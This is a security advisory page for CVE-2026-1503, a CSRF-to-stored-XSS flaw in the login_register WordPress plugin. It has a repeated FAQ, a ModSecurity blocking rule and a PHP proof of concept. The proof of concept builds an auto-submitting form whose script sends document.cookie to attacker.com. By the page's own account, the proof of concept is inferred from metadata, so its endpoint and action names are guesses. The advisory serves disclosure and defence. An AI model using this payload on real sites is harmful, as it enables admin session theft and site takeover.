What is CVE-2026-1503?

CVE-2026-1503 is a security vulnerability in the login_register plugin for WordPress, affecting versions up to and including 1.2.0. It allows for Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) due to missing nonce validation and insufficient input sanitization.

How does the vulnerability work?

The vulnerability enables attackers to send forged requests that can inject malicious scripts into the plugin’s settings. When an administrator visits the compromised settings page, the injected script executes in their browser, potentially leading to session hijacking or unauthorized actions.

Who is affected by this vulnerability?

Any WordPress site using the login_register plugin version 1.2.0 or earlier is vulnerable. Administrators of these sites should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the login_register plugin installed on your WordPress site. If it is version 1.2.0 or earlier, your site is at risk and should be updated immediately.

What are the recommended steps to fix this vulnerability?

To remediate CVE-2026-1503, developers should implement nonce validation in the plugin’s settings update function and ensure proper input sanitization and output escaping for the ‘login_register_login_post’ parameter.

What does the CVSS score of 4.3 signify?

The CVSS score of 4.3 indicates a medium severity vulnerability. It suggests that while the attack complexity is low and no special privileges are required, user interaction is necessary, which can lead to integrity issues.

What is Cross-Site Request Forgery (CSRF)?

CSRF is an attack that tricks an authenticated user into executing unwanted actions on a web application. In this case, it allows attackers to exploit the trust a site has in the user’s browser.

What is Stored Cross-Site Scripting (XSS)?

Stored XSS occurs when an attacker injects malicious scripts that are stored on the server and executed when users access the affected page. This can lead to data theft, session hijacking, and other malicious activities.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can craft a malicious payload targeting the ‘login_register_login_post’ parameter. It shows how this payload could be executed by tricking an administrator into visiting a specially crafted page.

What should I do if my site has been exploited?

If your site has been exploited, immediately remove the malicious scripts, change passwords, and review user accounts for unauthorized changes. Consider restoring from a clean backup and applying the necessary updates to prevent future vulnerabilities.

Are there any additional security measures I should take?

In addition to updating vulnerable plugins, regularly audit your WordPress site for security issues, implement a Web Application Firewall (WAF), and educate users about phishing and social engineering attacks.

Where can I find more information about this vulnerability?

For more information about CVE-2026-1503, refer to the official CVE database, security advisories from the plugin developers, and trusted cybersecurity resources that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 25, 2026

CVE-2026-1503: login_register <= 1.2.0 – Cross-Site Request Forgery to Stored Cross-Site Scripting (login-register)

CVE ID CVE-2026-1503

Plugin login-register

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.2.0

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1503 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) to Stored Cross-Site Scripting (XSS) chain in the login_register WordPress plugin versions up to 1.2.0. The vulnerability resides in the plugin’s settings page, specifically affecting the ‘login_register_login_post’ parameter. Attackers can inject malicious scripts that persist and execute when administrators view the compromised settings page.

Atomic Edge research infers the root cause from the CWE classification and vulnerability description. The plugin lacks nonce validation on its settings page, allowing forged requests to be processed. The plugin also fails to properly sanitize input and escape output for the ‘login_register_login_post’ parameter. These conclusions are inferred from the CWE 352 (CSRF) classification and the description’s mention of missing nonce validation and insufficient input sanitization/output escaping. No source code was available for confirmation.

Exploitation requires an attacker to trick an administrator into clicking a malicious link or visiting a crafted page while authenticated to the WordPress dashboard. The forged request likely targets the plugin’s settings update handler, typically an AJAX endpoint or admin-post.php action. A payload containing JavaScript would be submitted via the ‘login_register_login_post’ parameter. The injected script would then execute in the administrator’s browser when they later visit the plugin’s settings page.

Remediation requires two distinct code changes. Developers must implement nonce verification on the plugin’s settings update function to prevent CSRF. They must also apply proper input sanitization (e.g., `sanitize_text_field`) to the ‘login_register_login_post’ parameter upon receipt and apply appropriate output escaping (e.g., `esc_attr`, `esc_html`) when the parameter’s value is rendered in the browser.

Successful exploitation leads to stored XSS in the WordPress administration area. An attacker can execute arbitrary JavaScript in the context of an administrator’s session. This can result in session hijacking, creation of new administrative accounts, installation of backdoor plugins, or site defacement. The CVSS score of 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) indicates a network-based attack with low complexity, no required privileges, but requiring user interaction, leading to low integrity impact.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1503 (metadata-based)
# This rule blocks exploitation targeting the inferred AJAX endpoint and vulnerable parameter.
# It matches requests to admin-ajax.php with the likely action name and detects XSS payloads in the 'login_register_login_post' parameter.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261503,phase:2,deny,status:403,chain,msg:'CVE-2026-1503: CSRF to Stored XSS in login_register plugin via AJAX',severity:'CRITICAL',tag:'CVE-2026-1503',tag:'WordPress',tag:'Plugin=login-register',tag:'Attack/XSS',tag:'Attack/CSRF'"
  SecRule ARGS_POST:action "@rx ^(login_register_save_settings|login_register_update_options)$" "chain"
    SecRule ARGS_POST:login_register_login_post "@rx <script[^>]*>" 
      "t:lowercase,t:htmlEntityDecode,t:removeWhitespace,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1503 - login_register <= 1.2.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2026-1503.
 * This script generates a CSRF payload to inject XSS via the 'login_register_login_post' parameter.
 * Assumptions based on WordPress plugin patterns:
 * 1. The plugin uses an AJAX action or admin-post.php endpoint for saving settings.
 * 2. The vulnerable parameter is 'login_register_login_post'.
 * 3. No nonce validation exists on the target endpoint.
 *
 * The attacker would host this script and trick an admin into visiting it.
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php';
// Alternative endpoint could be admin-post.php
// $target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin-post.php';

// Construct the malicious payload. This script creates an alert and demonstrates potential for theft.
$xss_payload = '<script>alert("Atomic Edge CVE-2026-1503 PoC");fetch("https://attacker.com/steal?c="+document.cookie);</script>';

// The action name is inferred from the plugin slug and common patterns.
// Common patterns: 'save_settings', 'update_settings', plugin-prefixed actions.
$inferred_action = 'login_register_save_settings';

// Build the HTML form that auto-submits via CSRF.
echo '<!DOCTYPE html><html><body>';
echo '<h2>CVE-2026-1503 CSRF to XSS PoC</h2>';
echo '<p>If an admin visits this page, their browser will silently submit malicious settings.</p>';
echo '<form id="exploit" method="POST" action="' . htmlspecialchars($target_url) . '">';
echo '<input type="hidden" name="action" value="' . htmlspecialchars($inferred_action) . '" />';
echo '<input type="hidden" name="login_register_login_post" value="' . htmlspecialchars($xss_payload) . '" />';
echo '</form>';
echo '<script>document.getElementById("exploit").submit();</script>';
echo '</body></html>';
?>

Frequently Asked Questions

What is CVE-2026-1503?
Overview of the vulnerability
CVE-2026-1503 is a security vulnerability in the login_register plugin for WordPress, affecting versions up to and including 1.2.0. It allows for Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) due to missing nonce validation and insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability enables attackers to send forged requests that can inject malicious scripts into the plugin’s settings. When an administrator visits the compromised settings page, the injected script executes in their browser, potentially leading to session hijacking or unauthorized actions.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the login_register plugin version 1.2.0 or earlier is vulnerable. Administrators of these sites should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the login_register plugin installed on your WordPress site. If it is version 1.2.0 or earlier, your site is at risk and should be updated immediately.
What are the recommended steps to fix this vulnerability?
Mitigation strategies
To remediate CVE-2026-1503, developers should implement nonce validation in the plugin’s settings update function and ensure proper input sanitization and output escaping for the ‘login_register_login_post’ parameter.
What does the CVSS score of 4.3 signify?
Understanding risk level
The CVSS score of 4.3 indicates a medium severity vulnerability. It suggests that while the attack complexity is low and no special privileges are required, user interaction is necessary, which can lead to integrity issues.
What is Cross-Site Request Forgery (CSRF)?
Definition and impact
CSRF is an attack that tricks an authenticated user into executing unwanted actions on a web application. In this case, it allows attackers to exploit the trust a site has in the user’s browser.
What is Stored Cross-Site Scripting (XSS)?
Definition and consequences
Stored XSS occurs when an attacker injects malicious scripts that are stored on the server and executed when users access the affected page. This can lead to data theft, session hijacking, and other malicious activities.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of exploitation
The proof of concept illustrates how an attacker can craft a malicious payload targeting the ‘login_register_login_post’ parameter. It shows how this payload could be executed by tricking an administrator into visiting a specially crafted page.
What should I do if my site has been exploited?
Response to exploitation
If your site has been exploited, immediately remove the malicious scripts, change passwords, and review user accounts for unauthorized changes. Consider restoring from a clean backup and applying the necessary updates to prevent future vulnerabilities.
Are there any additional security measures I should take?
Best practices for WordPress security
In addition to updating vulnerable plugins, regularly audit your WordPress site for security issues, implement a Web Application Firewall (WAF), and educate users about phishing and social engineering attacks.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2026-1503, refer to the official CVE database, security advisories from the plugin developers, and trusted cybersecurity resources that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations